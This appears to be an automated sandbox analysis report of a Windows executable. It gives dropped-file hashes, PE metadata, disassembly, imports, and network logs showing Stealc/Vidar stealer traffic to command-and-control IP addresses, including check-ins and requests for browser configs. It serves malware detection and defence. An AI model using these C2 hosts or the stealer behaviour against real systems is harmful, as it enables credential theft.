                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1329417
                                                                                                                                                      Entropy (8bit):7.898171122766659
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                      MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                      SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                      SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                      SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                      Entropy (8bit):6.46619614175955
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                      MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                      SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                      SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                      SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):87278
                                                                                                                                                      Entropy (8bit):4.38402884518968
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                      MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                      SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                      SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                      SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (787)
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):792
                                                                                                                                                      Entropy (8bit):5.171152867158667
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:bZczaXqUqBHslgT9lCuABuoB7HHHHHHHYqmffffffo:bqaXqTKlgZ01BuSEqmffffffo
                                                                                                                                                      MD5:D442BE506DE6268D04FC1F7BB6BF0D9C
                                                                                                                                                      SHA1:0468FD242E05A18FED06421F3F5C25968E73BEB4
                                                                                                                                                      SHA-256:82A211D13A04514E4EC121FA2818C8B8D5F9020610351CA6FEBF1518F7B5C65B
                                                                                                                                                      SHA-512:160E675949163A6BDB93EF2C3359B544A0547210D86ADC2A0F7971D14AB9D4AF876DBBF4EFC7D08BBA871FE21FD67840BA951D4A0FDF077FDB12DBDA94EC33B2
                                                                                                                                                      Malicious:false
                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                      Preview:)]}'.["",["nfl draft byron murphy","fcc internet","lego milky way galaxy","kansas city tornadoes","wordle today answer april 26","shamrock golden retriever puppy","what draft picks do eagles have in 2024","latin american music awards winners"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Entropy (8bit):7.328176831472749
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:TNQTc6Qmkg.exe
                                                                                                                                                      File size:441'857 bytes
                                                                                                                                                      MD5:fcac04fb67b3dec2db923867c5cb0701
                                                                                                                                                      SHA1:56af848d85c781fd6ac0b8e11b2aec770fc4a105
                                                                                                                                                      SHA256:df620b823687fa8371cb9e5a0dc17c483d804ef601757968b8666de2608d8ebb
                                                                                                                                                      SHA512:66dd7676f43c1578e9d1f2e7e6bca50ae84541497d7b5801872fe7bad8118bc92d06ba4fd0f7a0f0b47e3d47485f116e89bf43e3324c1ef767d2d62befa236cd
                                                                                                                                                      SSDEEP:12288:FiJmkAC1wKXfuGRen+MkNDbfs+uR6/N40KZ:Hk2quGRO+MkNDg+uR6/u0W
                                                                                                                                                      TLSH:5B949E2372E0BC60E526473E9F1EA6E8372DF9208F65EB67224C5D1F15712B0D263792
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...|P.d...........
                                                                                                                                                      Icon Hash:531151454545610d
                                                                                                                                                      Entrypoint:0x404102
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x6402507C [Fri Mar 3 19:54:36 2023 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:5
                                                                                                                                                      OS Version Minor:1
                                                                                                                                                      File Version Major:5
                                                                                                                                                      File Version Minor:1
                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                      Import Hash:7b429a3347fd898e799116b6973c5111
                                                                                                                                                      Instruction
                                                                                                                                                      call 00007F0354740F22h
                                                                                                                                                      jmp 00007F035473AB25h
                                                                                                                                                      push 00000014h
                                                                                                                                                      push 00418FA0h
                                                                                                                                                      call 00007F035473CABDh
                                                                                                                                                      call 00007F035473F678h
                                                                                                                                                      movzx esi, ax
                                                                                                                                                      push 00000002h
                                                                                                                                                      call 00007F0354740EB5h
                                                                                                                                                      pop ecx
                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                      je 00007F035473AB26h
                                                                                                                                                      xor ebx, ebx
                                                                                                                                                      jmp 00007F035473AB55h
                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                      jne 00007F035473AB0Dh
                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                      jne 00007F035473AAFFh
                                                                                                                                                      xor ebx, ebx
                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                      jbe 00007F035473AB2Bh
                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                      setne bl
                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                      call 00007F035473EFFEh
                                                                                                                                                      test eax, eax
                                                                                                                                                      jne 00007F035473AB2Ah
                                                                                                                                                      push 0000001Ch
                                                                                                                                                      call 00007F035473AC01h
                                                                                                                                                      pop ecx
                                                                                                                                                      call 00007F0354740AB3h
                                                                                                                                                      test eax, eax
                                                                                                                                                      jne 00007F035473AB2Ah
                                                                                                                                                      push 00000010h
                                                                                                                                                      call 00007F035473ABF0h
                                                                                                                                                      pop ecx
                                                                                                                                                      call 00007F035473F540h
                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                                      call 00007F035473DFF7h
                                                                                                                                                      test eax, eax
                                                                                                                                                      jns 00007F035473AB2Ah
                                                                                                                                                      push 0000001Bh
                                                                                                                                                      call 00007F035473ABD6h
                                                                                                                                                      pop ecx
                                                                                                                                                      call dword ptr [004130C0h]
                                                                                                                                                      mov dword ptr [04042910h], eax
                                                                                                                                                      call 00007F0354740F09h
                                                                                                                                                      mov dword ptr [00454EC0h], eax
                                                                                                                                                      call 00007F0354740B06h
                                                                                                                                                      test eax, eax
                                                                                                                                                      jns 00007F035473AB2Ah
                                                                                                                                                      Programming Language:
                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                      • [LNK] VS2013 UPD5 build 40629
                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x193f40x28.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c430000x16b25.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c5a0000x1454.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x132000x38.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x188c80x40.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x130000x18c.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x10000x118930x11a00ca5bc49b8187fa646d9a75c8de94b281False0.609624335106383data6.6863316881946195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rdata0x130000x6cce0x6e003df6ea9d6335d8a1353d73e4da74d796False0.3877840909090909data4.724002293602075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .data0x1a0000x3c289280x3b000cbd1ceeaf9142ab773455b99fb8144aeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .rsrc0x3c430000x16b250x16c00154f3e607e787fb91651b559b729e8a3False0.42682220123626374data4.971687043528804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x3c5a0000x14540x1600aeb538b00bbd53425e4c7205bbd4074eFalse0.7235440340909091data6.347740184989028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_ICON0x3c436b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.4066820276497696
                                                                                                                                                      RT_ICON0x3c43d800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.16400414937759336
                                                                                                                                                      RT_ICON0x3c463280x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.21365248226950354
                                                                                                                                                      RT_ICON0x3c467900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3694029850746269
                                                                                                                                                      RT_ICON0x3c476380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4562274368231047
                                                                                                                                                      RT_ICON0x3c47ee00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.46255760368663595
                                                                                                                                                      RT_ICON0x3c485a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4486994219653179
                                                                                                                                                      RT_ICON0x3c48b100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2671161825726141
                                                                                                                                                      RT_ICON0x3c4b0b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.30909943714821764
                                                                                                                                                      RT_ICON0x3c4c1600x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.35904255319148937
                                                                                                                                                      RT_ICON0x3c4c5c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5666311300639659
                                                                                                                                                      RT_ICON0x3c4d4700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5532490974729242
                                                                                                                                                      RT_ICON0x3c4dd180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.6170520231213873
                                                                                                                                                      RT_ICON0x3c4e2800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4627593360995851
                                                                                                                                                      RT_ICON0x3c508280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4899155722326454
                                                                                                                                                      RT_ICON0x3c518d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.4934426229508197
                                                                                                                                                      RT_ICON0x3c522580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.44858156028368795
                                                                                                                                                      RT_ICON0x3c526c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4229744136460554
                                                                                                                                                      RT_ICON0x3c535680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4833032490974729
                                                                                                                                                      RT_ICON0x3c53e100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5858294930875576
                                                                                                                                                      RT_ICON0x3c544d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5079479768786127
                                                                                                                                                      RT_ICON0x3c54a400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.47271784232365144
                                                                                                                                                      RT_ICON0x3c56fe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.48545966228893056
                                                                                                                                                      RT_ICON0x3c580900x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.49508196721311476
                                                                                                                                                      RT_ICON0x3c58a180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5452127659574468
                                                                                                                                                      RT_STRING0x3c58e800x332data0.47555012224938875
                                                                                                                                                      RT_STRING0x3c591b40x354data0.46830985915492956
                                                                                                                                                      RT_GROUP_ICON0x3c595080x68data0.7115384615384616
                                                                                                                                                      RT_GROUP_ICON0x3c595700x68data0.6826923076923077
                                                                                                                                                      RT_GROUP_ICON0x3c595d80x30data0.9375
                                                                                                                                                      RT_GROUP_ICON0x3c596080x76data0.6779661016949152
                                                                                                                                                      RT_VERSION0x3c596800x244data0.5396551724137931
                                                                                                                                                      RT_MANIFEST0x3c598c40x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555
                                                                                                                                                      DLLImport
                                                                                                                                                      KERNEL32.dllGetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, TerminateThread, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, GetACP, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, EncodePointer, DecodePointer, HeapReAlloc, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetStdHandle, GetFileType, GetStartupInfoW, GetProcessHeap, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, SetFilePointerEx, LCMapStringW, OutputDebugStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW
                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      04/27/24-02:18:57.298293TCP2856233ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)4973080192.168.2.4185.172.128.90
                                                                                                                                                      04/27/24-02:19:03.852745TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                      04/27/24-02:19:02.778873TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4973380192.168.2.4185.172.128.76
                                                                                                                                                      04/27/24-02:19:03.279794TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                      04/27/24-02:19:03.561564TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                      04/27/24-02:19:03.564460TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 27, 2024 02:18:52.902697086 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                      Apr 27, 2024 02:18:57.122874975 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                      Apr 27, 2024 02:18:57.295671940 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:18:57.295909882 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                      Apr 27, 2024 02:18:57.298293114 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                      Apr 27, 2024 02:18:57.470125914 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:18:58.759468079 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:18:58.809022903 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                      Apr 27, 2024 02:18:58.962276936 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                      Apr 27, 2024 02:18:59.798409939 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                      Apr 27, 2024 02:18:59.969618082 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:18:59.969858885 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                      Apr 27, 2024 02:18:59.969858885 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                      Apr 27, 2024 02:19:00.142405987 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.143084049 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.144254923 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                      Apr 27, 2024 02:19:00.154562950 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.325936079 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.326019049 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.326092958 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.497167110 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497540951 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497560978 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497634888 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.497652054 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497745037 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497786999 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.497833014 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497939110 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.497978926 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.498017073 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.498099089 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.498138905 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.498167992 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.498302937 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.498342037 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.669612885 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669636011 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669652939 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669671059 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669689894 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669708014 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669724941 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669725895 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.669743061 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:00.669765949 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                      Apr 27, 2024 02:19:00.669779062 CEST4973280192.168.2.4185.172.128.59
